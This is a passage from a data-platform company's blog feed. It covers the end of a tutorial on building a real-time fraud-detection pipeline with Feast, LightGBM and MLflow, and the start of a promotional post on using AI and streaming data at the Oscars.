    &lt;span class=&quot;token string&quot;&gt;&quot;event_timestamp&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;     &lt;span class=&quot;token comment&quot;&gt;# timestamps for each transaction&lt;/span&gt;
    &lt;span class=&quot;token string&quot;&gt;&quot;fraud_label&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

training_df &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; fs&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;get_historical_features&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;
    entity_df&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;entity_df&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    features&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;transaction_features:amount&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
              &lt;span class=&quot;token string&quot;&gt;&quot;transaction_features:watchlist_flag&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
              &lt;span class=&quot;token string&quot;&gt;&quot;transaction_features:transaction_count_last_10m&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;to_df&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

&lt;span class=&quot;token comment&quot;&gt;# training_df now includes the needed columns + your label&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h4&gt;3.2 Train a Model (e.g., LightGBM)&lt;/h4&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;python&quot;&gt;&lt;pre class=&quot;language-python&quot;&gt;&lt;code class=&quot;language-python&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; lightgbm &lt;span class=&quot;token keyword&quot;&gt;as&lt;/span&gt; lgb
&lt;span class=&quot;token keyword&quot;&gt;from&lt;/span&gt; sklearn&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;model_selection &lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; train_test_split
&lt;span class=&quot;token keyword&quot;&gt;from&lt;/span&gt; sklearn&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;metrics &lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; roc_auc_score

pdf &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; training_df&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;dropna&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;  &lt;span class=&quot;token comment&quot;&gt;# remove partial data&lt;/span&gt;
X &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; pdf&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;drop&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;columns&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;fraud_label&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;event_timestamp&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;account_id&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
y &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; pdf&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;fraud_label&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;

X_train&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; X_test&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; y_train&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; y_test &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; train_test_split&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;X&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; y&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; stratify&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;y&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; random_state&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;42&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

dtrain &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; lgb&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Dataset&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;X_train&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; label&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;y_train&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
dtest &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; lgb&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Dataset&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;X_test&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; label&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;y_test&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; reference&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;dtrain&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

params &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  &lt;span class=&quot;token string&quot;&gt;&quot;objective&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;binary&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
  &lt;span class=&quot;token string&quot;&gt;&quot;metric&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;auc&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
  &lt;span class=&quot;token string&quot;&gt;&quot;is_unbalance&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;True&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

model &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; lgb&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;train&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;params&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; dtrain&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; num_boost_round&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;100&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; valid_sets&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;dtest&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; callbacks&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;lgb&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;early_stopping&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;10&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;  &lt;span class=&quot;token comment&quot;&gt;# the early_stopping_rounds kwarg was removed in LightGBM 4; use the callback&lt;/span&gt;
y_pred &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; model&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;predict&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;X_test&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
auc &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; roc_auc_score&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;y_test&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; y_pred&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;token keyword&quot;&gt;print&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string-interpolation&quot;&gt;&lt;span class=&quot;token string&quot;&gt;f&quot;Test AUC: &lt;/span&gt;&lt;span class=&quot;token interpolation&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;auc&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token format-spec&quot;&gt;.4f&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h4&gt;3.3 Register in MLflow&lt;/h4&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;python&quot;&gt;&lt;pre class=&quot;language-python&quot;&gt;&lt;code class=&quot;language-python&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; mlflow
&lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; mlflow&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;lightgbm

mlflow&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;set_experiment&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;/Users/your.name@company.com/fraud_experiment&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;with&lt;/span&gt; mlflow&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;start_run&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    mlflow&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;lightgbm&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;log_model&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;model&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; artifact_path&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;model&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; registered_model_name&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;FraudDetectionModel&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
    mlflow&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;log_metric&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;auc&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; auc&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
    run_id &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; mlflow&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;active_run&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;info&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;run_id
    &lt;span class=&quot;token keyword&quot;&gt;print&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string-interpolation&quot;&gt;&lt;span class=&quot;token string&quot;&gt;f&quot;Model logged in run: &lt;/span&gt;&lt;span class=&quot;token interpolation&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;run_id&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
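Once registered, downstream services can pull the model back out of the registry by name rather than by run ID. A sketch under stated assumptions: the version number is illustrative and the helper name is ours, while `mlflow.pyfunc.load_model` and `models:/` URIs are MLflow's standard loading mechanism:

```python
def load_fraud_model(model_uri="models:/FraudDetectionModel/1", loader=None):
    """Load a registered model; `loader` defaults to mlflow.pyfunc.load_model."""
    if loader is None:
        # Deferred import so the helper can be defined without a tracking server.
        import mlflow.pyfunc
        loader = mlflow.pyfunc.load_model
    return loader(model_uri)
```

A `models:/Name/Stage` URI (e.g., `models:/FraudDetectionModel/Production`) also works once the version has been promoted to a stage.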
&lt;hr&gt;
&lt;h3&gt;Step 4: Real-Time Fraud Scoring&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Databricks Model Serving&lt;/strong&gt; (or a custom microservice) hosts the trained model.&lt;/li&gt;
&lt;li&gt;When a &lt;strong&gt;new transaction&lt;/strong&gt; arrives, Conduit has already fed the relevant data to Feast’s &lt;strong&gt;online store&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;The serving endpoint:
&lt;ul&gt;
&lt;li&gt;Looks up the latest features for &lt;code class=&quot;language-text&quot;&gt;account_id&lt;/code&gt; from the Feast online store (Redis).&lt;/li&gt;
&lt;li&gt;Passes those features to the LightGBM model.&lt;/li&gt;
&lt;li&gt;Returns a fraud probability in real time.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;If the &lt;strong&gt;fraud probability&lt;/strong&gt; is above a threshold, an &lt;strong&gt;alert&lt;/strong&gt; or &lt;strong&gt;blocking action&lt;/strong&gt; is triggered.&lt;/li&gt;
&lt;/ol&gt;
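The lookup-and-score steps above can be sketched as a small scoring function. This is a sketch, not the exact serving code: the feature list mirrors the feature view defined earlier, the threshold and helper name are illustrative, and `get_online_features` is Feast's standard online lookup:

```python
FEATURES = [
    "transaction_features:amount",
    "transaction_features:watchlist_flag",
    "transaction_features:transaction_count_last_10m",
]

def score_transaction(fs, model, account_id, threshold=0.9):
    """Look up online features for the account, score them, and flag high risk."""
    # fs is a feast.FeatureStore; get_online_features reads from Redis.
    row = fs.get_online_features(
        features=FEATURES,
        entity_rows=[{"account_id": account_id}],
    ).to_dict()
    # Build the model input in the same feature order used at training time.
    x = [[row["amount"][0],
          row["watchlist_flag"][0],
          row["transaction_count_last_10m"][0]]]
    prob = model.predict(x)[0]
    return {"account_id": account_id,
            "fraud_probability": prob,
            "alert": prob >= threshold}
```

The serving endpoint would call this per transaction and trigger the alerting or blocking action whenever `alert` is true.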
&lt;hr&gt;
&lt;h3&gt;Conclusion&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Conduit&lt;/strong&gt; seamlessly integrates with &lt;strong&gt;Feast&lt;/strong&gt; and &lt;strong&gt;Databricks&lt;/strong&gt; to enable &lt;strong&gt;real-time fraud detection&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Conduit&lt;/strong&gt; handles high-throughput, low-latency &lt;strong&gt;data ingestion&lt;/strong&gt; and &lt;strong&gt;transformations&lt;/strong&gt; using built-in processors.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Feast&lt;/strong&gt; manages consistent &lt;strong&gt;offline and online feature stores&lt;/strong&gt; (S3 + Redis).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Databricks&lt;/strong&gt; powers the &lt;strong&gt;ML pipeline&lt;/strong&gt; (training, model registry, real-time serving).&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;With this setup, banks and financial institutions can quickly detect and respond to fraudulent transactions, leveraging a robust, scalable data infrastructure.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Ready to learn more?&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Dive into the &lt;a href=&quot;https://conduit.io/docs/&quot;&gt;Conduit documentation&lt;/a&gt; for more detailed pipeline configs and processor usage.&lt;/li&gt;
&lt;li&gt;Explore the Feast docs for advanced feature store topics.&lt;/li&gt;
&lt;li&gt;Check out Databricks MLflow docs for model tracking and deployment.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Stay tuned for more guides on building next-generation data pipelines and ML workflows with Conduit and Feast—accelerating your fraud detection, analytics, and beyond. Follow us on &lt;a href=&quot;https://twitter.com/meroxadata&quot;&gt;Twitter&lt;/a&gt;, &lt;a href=&quot;https://www.linkedin.com/company/meroxa&quot;&gt;LinkedIn&lt;/a&gt;, and &lt;a href=&quot;https://youtube.com/@meroxadata143&quot;&gt;YouTube&lt;/a&gt; for more insights and updates!&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Happy streaming and safe banking!&lt;/strong&gt;&lt;/p&gt;</content:encoded></item><item><title><![CDATA[AI & Data at the Oscars: How Meroxa Can Power Hollywood's Biggest Night]]></title><description><![CDATA[Discover how AI and real-time data power the Oscars, from predicting winners and analyzing audience sentiment to securing online voting and enhancing live event experiences. This blog explores how Meroxa’s Conduit Platform enables seamless real-time data movement, helping data science and AI teams drive insights, security, and engagement at Hollywood’s biggest night. 🚀🎬 Read more to see how data is shaping the future of entertainment!]]></description><link>https://meroxa.com/blog/ai-and-data-at-the-oscars-how-meroxa-can-power-hollywoods-biggest-night</link><guid isPermaLink="false">https://meroxa.com/blog/ai-and-data-at-the-oscars-how-meroxa-can-power-hollywoods-biggest-night</guid><dc:creator><![CDATA[Dion Keeton]]></dc:creator><pubDate>Mon, 03 Mar 2025 11:13:00 GMT</pubDate><content:encoded>&lt;p&gt;The &lt;strong&gt;Academy Awards (Oscars)&lt;/strong&gt; are more than just a celebration of cinema; they are a &lt;strong&gt;data-driven&lt;/strong&gt; event where &lt;strong&gt;AI, machine learning, and real-time analytics&lt;/strong&gt; play a crucial role in predicting winners, analyzing audience sentiment, and ensuring secure voting.&lt;/p&gt;
&lt;p&gt;For &lt;strong&gt;data science and AI leaders&lt;/strong&gt;, ensuring smooth, real-time data flows across diverse systems is critical. This is where &lt;strong&gt;Meroxa’s Conduit Platform&lt;/strong&gt; comes in. By enabling &lt;strong&gt;real-time data movement&lt;/strong&gt; across &lt;strong&gt;databases, APIs, and analytics platforms&lt;/strong&gt;, Meroxa helps power the AI-driven insights behind Hollywood’s biggest night.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;Predicting Oscar Winners with Real-Time Data Processing&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Studios, media analysts, and prediction platforms leverage &lt;strong&gt;machine learning models&lt;/strong&gt; to predict winners based on:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Historical win patterns&lt;/strong&gt; (e.g., previous Best Picture trends)&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Social media sentiment&lt;/strong&gt; (Twitter, Reddit, TikTok engagement)&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Box office revenue &amp;#x26; streaming metrics&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Award season trajectory&lt;/strong&gt; (Golden Globes, BAFTAs, Critics’ Choice, etc.)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;How Meroxa Helps:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Real-time ingestion&lt;/strong&gt; of &lt;strong&gt;box office data, streaming metrics, and social media sentiment&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;ETL &amp;#x26; transformation&lt;/strong&gt; to prepare data for machine learning models.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Seamless movement&lt;/strong&gt; of insights to analytics platforms like &lt;strong&gt;BigQuery, Snowflake, or ClickHouse&lt;/strong&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Below is an example flow of predictive analytics in action:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/oscar-predictions.png&quot; alt=&quot;oscar-predictions.png&quot;&gt;&lt;/p&gt;
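&lt;p&gt;As a rough illustration of the idea (not Meroxa code), here is a minimal Python sketch of a weighted scoring model over signals like the ones listed above; the feature names, weights, and numbers are entirely hypothetical:&lt;/p&gt;

```python
# Illustrative only: a toy scoring model that combines the signals listed
# above (award-season wins, sentiment, box office) into a winner prediction.
# Feature names and weights are hypothetical, not part of any Meroxa API.

WEIGHTS = {"precursor_wins": 0.5, "sentiment": 0.3, "box_office_norm": 0.2}

def score(nominee: dict) -> float:
    """Weighted sum of normalized feature values (each in [0, 1])."""
    return sum(WEIGHTS[k] * nominee[k] for k in WEIGHTS)

def predict_winner(nominees: dict) -> str:
    """Return the nominee with the highest combined score."""
    return max(nominees, key=lambda name: score(nominees[name]))

nominees = {
    "Film A": {"precursor_wins": 0.9, "sentiment": 0.6, "box_office_norm": 0.4},
    "Film B": {"precursor_wins": 0.5, "sentiment": 0.9, "box_office_norm": 0.9},
}
print(predict_winner(nominees))  # Film A
```

&lt;p&gt;In a real pipeline the features would be refreshed continuously from the streamed sources, and the hand-tuned weights replaced by a trained model.&lt;/p&gt;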
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;AI-Driven Audience Sentiment Analysis&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;During the Oscars, real-time audience sentiment analysis is key to:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Understanding &lt;strong&gt;public reactions&lt;/strong&gt; to winners and speeches.&lt;/li&gt;
&lt;li&gt;Tracking &lt;strong&gt;fan-favorite picks vs. Academy choices&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;Optimizing social media engagement and live event interactions.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;How Meroxa Helps:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Ingests live tweets, comments, and reactions from APIs.&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Streams data into NLP models&lt;/strong&gt; for sentiment analysis.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Delivers results in real time&lt;/strong&gt; to dashboards for media analysts.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Below is an example flow of sentiment analysis with Meroxa:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/audience-sentiment.png&quot; alt=&quot;audience-sentiment.png&quot;&gt;&lt;/p&gt;
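&lt;p&gt;To make the NLP step concrete, here is a deliberately simple lexicon-based sketch in Python; production systems would stream posts into a real sentiment model rather than a word list, and all names here are illustrative:&lt;/p&gt;

```python
# Illustrative only: a toy lexicon-based sentiment scorer applied to a
# stream of social posts, aggregated per nominee for a live dashboard.
# A production pipeline would swap the word lists for a real NLP model.

import re
from collections import defaultdict

POSITIVE = {"love", "amazing", "deserved", "brilliant"}
NEGATIVE = {"robbed", "snubbed", "boring", "overrated"}

def sentiment(text: str) -> int:
    """+1 per positive word, -1 per negative word."""
    words = re.findall(r"[a-z]+", text.lower())
    return sum(w in POSITIVE for w in words) - sum(w in NEGATIVE for w in words)

def aggregate(posts):
    """Running sentiment totals keyed by nominee tag."""
    totals = defaultdict(int)
    for nominee, text in posts:
        totals[nominee] += sentiment(text)
    return dict(totals)

posts = [
    ("Film A", "Absolutely deserved, what a brilliant film"),
    ("Film B", "Totally overrated and boring"),
    ("Film A", "I love this cast"),
]
print(aggregate(posts))  # {'Film A': 3, 'Film B': -2}
```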
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;Secure and Transparent Voting with AI&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;The &lt;strong&gt;Oscars voting process&lt;/strong&gt; must be &lt;strong&gt;secure, transparent, and tamper-proof&lt;/strong&gt;. AI and data pipelines play a crucial role in:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Detecting anomalies&lt;/strong&gt; in voting patterns.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Ensuring secure voting transmission&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Providing audit logs&lt;/strong&gt; for transparency.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;How Meroxa Helps:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Streaming ingestion&lt;/strong&gt; of vote data into audit systems.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Real-time monitoring&lt;/strong&gt; for anomalies or suspicious voting patterns.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Secure logging&lt;/strong&gt; for regulatory compliance and verification.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Below is an example flow of AI-supported secure and transparent voting:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/secure-voting.png&quot; alt=&quot;secure-voting.png&quot;&gt;&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;AI-Enhanced Oscars Marketing and Content Recommendations&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Streaming platforms and media companies use AI to:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Recommend Oscar-nominated films to users.&lt;/li&gt;
&lt;li&gt;Personalize content based on viewing behavior.&lt;/li&gt;
&lt;li&gt;Target ads for Oscar-related promotions.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;How Meroxa Helps:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Connects customer engagement data (view history, clicks, preferences).&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Streams data into recommendation models.&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Delivers real-time personalization to streaming platforms.&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Below is an example flow of content and marketing recommendations:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/marketing-recommendations.png&quot; alt=&quot;marketing-recommendations.png&quot;&gt;&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;Live Event Enhancements&lt;/strong&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;AI-driven &lt;strong&gt;real-time analytics&lt;/strong&gt; track &lt;strong&gt;viewer engagement, social media mentions, and voting polls&lt;/strong&gt; during the Oscars ceremony.&lt;/li&gt;
&lt;li&gt;AI &lt;strong&gt;autogenerates captions and translations&lt;/strong&gt; to enhance accessibility for global audiences.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;How Meroxa Helps:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Ingests real-time viewer data from various streaming and social media platforms.&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Feeds live engagement data to AI models for insights.&lt;/strong&gt;&lt;/li&gt;
